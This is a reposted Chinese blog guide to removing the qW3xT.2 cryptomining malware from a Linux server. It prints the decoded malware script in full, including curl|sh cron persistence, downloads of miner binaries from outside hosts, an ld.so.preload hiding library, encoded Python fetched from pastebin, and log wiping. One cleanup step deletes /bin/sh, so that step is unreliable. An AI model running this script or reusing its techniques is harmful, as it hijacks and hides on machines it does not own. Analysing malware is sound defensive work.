2. 程式人生 > >挖礦病毒 qW3xT.2 最終解決方案

挖礦病毒 qW3xT.2 最終解決方案

阿新 發佈:2018-10-27
rop mod detail ios tail index $2 ashx hoc

轉自:https://blog.csdn.net/hgx13467479678/article/details/82347473

1,cpu 100%, 用top 查看cpu100

2,刪掉此進程 cpu還是 100%

3,估計是進程被隱藏了

4,定時任務多了一個執行任務

5:打開連接 https://pastebin.com/raw/xbY7p5Tb 獲取如下內容

6:打開 https://pastebin.com/raw/uuYVPLXd ,發現是一個Base64編碼字符串,

7:用Base64解碼此內容得到如下腳本內容

#!/bin/bash

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function kills() {

pkill -f sourplum

pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg

rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius

rm -rf /tmp/*index_bak*

rm -rf /tmp/*httpd.conf*

rm -rf /tmp/*httpd.conf

rm -rf /tmp/a7b104c270

ps auxf|grep -v grep|grep "mine.moneropool.com"|awk ‘{print $2}‘|xargs kill -9

ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk ‘{print $2}‘|xargs kill -9

ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk ‘{print $2}‘|xargs kill -9

ps auxf|grep -v grep|grep "monerohash.com"|awk ‘{print $2}‘|xargs kill -9

ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk ‘{print $2}‘|xargs kill -9

ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk ‘{print $2}‘|xargs kill -9

ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk ‘{print $2}‘|xargs kill -9

ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk ‘{print $2}‘|xargs kill -9

ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk ‘{print $2}‘|xargs kill -9

ps auxf|grep -v grep|grep "xmrpool.eu" | awk ‘{print $2}‘|xargs kill -9

ps auxf|grep -v grep|grep "xmrig" | awk ‘{print $2}‘|xargs kill -9

ps auxf|grep -v grep|grep "xmrigDaemon" | awk ‘{print $2}‘|xargs kill -9

ps auxf|grep -v grep|grep "xmrigMiner" | awk ‘{print $2}‘|xargs kill -9

pkill -f biosetjenkins

pkill -f AnXqV.yam

pkill -f xmrigDaemon

pkill -f xmrigMiner

pkill -f xmrig

pkill -f Loopback

pkill -f apaceha

pkill -f cryptonight

pkill -f stratum

pkill -f mixnerdx

pkill -f performedl

pkill -f JnKihGjn

pkill -f irqba2anc1

pkill -f irqba5xnc1

pkill -f irqbnc1

pkill -f ir29xc1

pkill -f conns

pkill -f irqbalance

pkill -f crypto-pool

pkill -f minexmr

pkill -f XJnRj

pkill -f NXLAi

pkill -f BI5zj

pkill -f askdljlqw

pkill -f minerd

pkill -f minergate

pkill -f Guard.sh

pkill -f ysaydh

pkill -f bonns

pkill -f donns

pkill -f kxjd

pkill -f Duck.sh

pkill -f bonn.sh

pkill -f conn.sh

pkill -f kworker34

pkill -f kw.sh

pkill -f pro.sh

pkill -f polkitd

pkill -f acpid

pkill -f icb5o

pkill -f nopxi

pkill -f irqbalanc1

pkill -f minerd

pkill -f i586

pkill -f gddr

pkill -f mstxmr

pkill -f ddg.2011

pkill -f wnTKYg

pkill -f deamon

pkill -f disk_genius

pkill -f sourplum

pkill -f bashx

pkill -f bashg

pkill -f bashe

pkill -f bashf

pkill -f bashh

pkill -f XbashY

pkill -f libapache

rm -rf /tmp/httpd.conf

rm -rf /tmp/conn

rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache

rm -rf /tmp/conns

rm -f /tmp/irq.sh

rm -f /tmp/irqbalanc1

rm -f /tmp/irq

rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json

netstat -anp | grep 69.28.55.86:443 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9

netstat -anp | grep 3333 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9

netstat -anp | grep 4444 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9

netstat -anp | grep 5555 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9

netstat -anp | grep 6666 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9

netstat -anp | grep 7777 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9

netstat -anp | grep 3347 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9

netstat -anp | grep 14444 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9

netstat -anp | grep 5.196.225.222 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9

y=$(ps aux | grep -v grep | grep kworkerds | wc -l )

if [ ${y} -eq 0 ];then

netstat -anp | grep 13531 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9

fi

}

function system() {

if [ ! -f "/bin/httpdns" ]; then

curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns

if [ ! -f "/bin/httpdns" ]; then

wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns

fi

sed -i ‘$d‘ /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >> /etc/crontab

fi

}

function top() {

if [ ! -f "/usr/local/lib/libntp.so" ]; then

curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so

if [ ! -f "/usr/local/lib/libntp.so" ]; then

wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so

fi

fi

if [ ! -f "/etc/ld.so.preload" ]; then

echo /usr/local/lib/libntp.so > /etc/ld.so.preload

else

sed -i ‘$d‘ /etc/ld.so.preload && echo /usr/local/lib/libntp.so >> /etc/ld.so.preload

fi

touch -acmr /bin/sh /etc/ld.so.preload

touch -acmr /bin/sh /usr/local/lib/libjdk.so

touch -acmr /bin/sh /usr/local/lib/libntp.so

echo 0>/var/spool/mail/root

echo 0>/var/log/wtmp

echo 0>/var/log/secure

echo 0>/var/log/cron

}

function python() {

nohup python -c "import base64;exec(base64.b64decode(‘I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz‘))" >/dev/null 2>&1 &

touch /tmp/.tmpa

}

function echocron() {

echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root

echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs

echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root

touch -acmr /bin/sh /etc/cron.d/root

touch -acmr /bin/sh /var/spool/cron/crontabs

touch -acmr /bin/sh /var/spool/cron/root

touch -acmr /bin/sh /var/spool/cron/crontabs/root

}

function downloadrun() {

ps=$(netstat -anp | grep 13531 | wc -l)

if [ ${ps} -eq 0 ];then

if [ ! -f "/tmp/kworkerds" ]; then

curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds

if [ ! -f "/tmp/kworkerds" ]; then

wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds

fi

nohup /tmp/kworkerds >/dev/null 2>&1 &

else

nohup /tmp/kworkerds >/dev/null 2>&1 &

fi

fi

}

function downloadrunxm() {

pm=$(netstat -anp | grep 13531 | wc -l)

if [ ${pm} -eq 0 ];then

if [ ! -f "/bin/config.json" ]; then

curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json

if [ ! -f "/bin/config.json" ]; then

wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json

fi

fi

if [ ! -f "/bin/kworkerds" ]; then

curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds

if [ ! -f "/bin/kworkerds" ]; then

wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds

fi

nohup /bin/kworkerds >/dev/null 2>&1 &

else

nohup /bin/kworkerds >/dev/null 2>&1 &

fi

fi

}

update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH )

if [ ${update}x = "update"x ];then

rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds

echocron

else

if [ ! -f "/tmp/.tmpa" ]; then

rm -rf /tmp/.tmp

python

fi

kills

downloadrun

echocron

system

top

sleep 10

port=$(netstat -anp | grep 13531 | wc -l)

if [ ${port} -eq 0 ];then

downloadrunxm

fi

fi

#

#

8:根據此腳本最終解決方案

A:先把定時任務刪除掉

rm -rf /etc/cron.d/root

rm -rf /var/spool/cron/crontabs

rm -rf /bin/sh /var/spool/cron/root

B:刪掉重啟系統後執行腳本

rm -rf /bin/httpdns

C:刪掉挖礦執行腳本

rm -rf /tmp/kworkerds

D: 刪除修top顯示命令的腳本 (導致top查詢不處理此挖礦進程)

rm -rf /usr/local/lib/libntp.so

E:刪除python執行文件

rm -rf /tmp/.tmpa

F: 再用Top命令,就可以找出此耗cpu進程

7:kill 掉此進程

9:修改redis 密碼,最好修改bind 為127.0.0.1

挖礦病毒 qW3xT.2 最終解決方案

相關推薦

病毒 qW3xT.2 最終解決方案

rop mod detail ios tail index $2 ashx hoc 轉自:https://blog.csdn.net/hgx13467479678/article/details/82347473 1,cpu 100%, 用top 查看cpu100

阿裏雲服務器被病毒minerd入侵的解決方法

minerd 挖礦病毒 挖礦程序 木馬 早晨上班像往常一樣對服務器進行例行巡檢,發現一臺阿裏雲服務器的CPU的資源占用很高,到底是怎麽回事呢,趕緊用top命令查看了一下,發現是一個名為minerd的進程占用了很高的CPU資源,minerd之前聽說過,是一種挖礦病毒,沒有想到我負責的服務器會中這

qW3xT.2解決病毒

創建 exp tab -a 在服務器 守護 root 服務 tmp目錄 首先殺死進程: 1.首先,將 CPU 占滿的進程殺死 2.它有一個 守護進程 ps -aux|grep ddg 刪除文件: 1.進入/tmp文件夾下。發現qW3xT.2文件,刪除。 2.刪除/tmp目錄

解決病毒占用cpu以及誤刪 ld-linux-x86-64.so.2 文件的問題

轉移 第一條 根目錄 man bios 原本 光盤 防止 隱藏權限 上次已經被抓去挖礦了當了一次曠工了,本以為解決了,沒想到竟然死灰復燃。 這次占用cpu的依然是一個ld-linux的進程,kill掉之後同樣就查了關於test用戶的進程,果然,test用戶的進程有100+個

linux 伺服器被植入ddgs、qW3xT.2病毒處理記錄

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "" > /var/spool/cron/root echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.s

最新病毒qW3xT.2)指令碼

這是公司阿里雲付伺服器昨天發現的挖礦病毒執行指令碼,那位大佬能看懂,幫忙解決啊,急啊 #!/bin/bash SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin f

qW3xT.2病毒指令碼解析

最近有兩臺阿里雲伺服器中了挖礦病毒,CPU佔用率一直百分百。本帖就不詳細說明如何清除了,網上很多資源。由於好奇,我把該病毒的定時指令碼給下載下來,大家可以學習一下。 中了招的主機,在計劃任務中都有這麼一段: */15 * * * * curl -fsSL http://149.56.106.

病毒 解決思路 xmr

strong username 查看cpu ESS spider pool nobody join virt 基本上通過服務器挖礦只能利用cpu的性能了,所以 top查看cpu利用率,但是程序會影藏,讓你看不見,解決:刪除/usr/local/lib/libntp.so ,

記一次解決伺服器病毒qW3xT.2經歷

先是在伺服器出現警告,說可能是挖礦的病毒。剛開始沒當回事,當把這個病毒百度之後發現,很嚴重吶。 好了,開始幹活。 第一步: 連結地址 :https://blog.csdn.net/weixin_41228949/article/details/81501753 然鵝,沒有成功。。。。

Weblogic漏洞病毒解決方法

  1、 中病毒現象 此病毒基於Weblogic服務漏洞發起攻擊,造成系統宕機,cpu使用率高達400%以上。 2、 檢視病毒程序 Linux命令:root使用者執行top命令 ,會出現.data、.conn等程序。 Windows:檢視裝置管理器 也是出現.

伺服器病毒問題解決- 阿里雲 病毒,Circle_MI.png

http://blog.51cto.com/chaojiit/1924111 今天我們的伺服器 CPU 跑滿了,最後發現是中了兩個病毒,病毒有時是惡意毀壞你的資料,有的為了當做肉機, 當你遇到機器本身沒跑什麼東西,但是很慢的情況下,可以top 看一下機器的使用情

U盤安裝CentOS7的最終解決方案

u盤安裝 發現 clas usb 設置 電腦 安裝 軟件 哪裏 U盤安裝CentOS7的最終解決方案 終於將CentOS7裝上筆記本了,過程無比艱辛,因為我發現網上大家提到的所有U盤安裝CentOS7時碰到的問題幾乎都被我碰到了,像什麽: 1.刻錄鏡像的時候只能刻

關於勒索病毒 Ransom:Win32.WannaCrypt 解決方案的最後一次說明

勒索軟件關於勒索病毒 Ransom:Win32.WannaCrypt 解決方案的最後一次說明2017/5/12 晚,勒索軟件 Ransom:Win32.WannaCrypt 大面積暴發。比病毒爆發更火的,則是各類關於此病毒的新聞、解決方法等在朋友圈等社交媒體的爆發。其中,有主觀善意客觀一知半解的知道,更有夾帶

fatal error LNK1123: 轉換到 COFF 期間失敗: 文件無效或損壞 最終解決方案及VS10.12CLR選擇NET版本

mic c++ vs2008 soft globals oba target vs編譯 編譯 安裝多個VS 出現這個問題 fatal error LNK1123: 轉換到 COFF 期間失敗: 文件無效或損壞 。 VS2010和VS2012或者sv2008和VS2010,高

服務器病毒的排查過程

挖礦今天同事反饋公司的某臺服務器遠程連接不上,登錄服務器查看後,發現CPU使用率居高不下。kill掉後,一分鐘有自動生成,整個排查思路如下:1、top 命令查看主機負載,確認可疑進程為bashd2、確認可疑進程嘗試殺掉,pkill bashd ,但發現一會就出現,懷疑有定時任務 3、 排查定時任務,定時任務有

關於Hibernate懶加載問題的最終解決方案

ransac err work eth 功能 就會 過濾器 except 沒有 看到一篇Hibernate懶加載的文章,所以轉載,原地址如下: http://tuoxie007.iteye.com/blog/334853 Hibernate的強大之處之一是懶加載功能,可

Win10系統無法啟動的最終解決方案

window 操作系統電腦操作失誤導致系統無法啟動。分享一下Win10系統無法啟動的最終解決方案。操作步驟如下:1、首先需要準備一個Windows10安裝盤,只需將Windows10微軟原版鏡像寫入U盤即可。當然如果你沒有事先準備好的安裝盤的話,就需要找另外一臺電腦制作了。2、從U盤啟動,會出現下圖所示的界面

WebKit.NET-0.5簡單應用(2)——音量解決方案

word entry imp ssi rsh turn ati window bject 查找WebKit.NET相關文檔,沒有找到音量控制解決方法。換思路進行解決,嘗試用Win32 API進行解決 [DllImport("winmm.dll")] public stat

redis requires ruby version 2.2.2解決方案

命令 configure .net rap pan -h tro ext download 原文:redis requires ruby version 2.2.2的解決方案 今天在做Redis的Cluster集群的時候,在執行gem install redis時,提示

記一次手動清理Linux病毒

pan fff 殺毒軟件 win10 ado top 根據 部門 enter 時間:2018年5月16日起因:某公司的運維人員在綠盟的IPS上監測到有挖"門羅幣"的惡意事件,受影響的機器為公司的大數據服務器以及其他Linux服務器。我也是趕鴨子上架第一次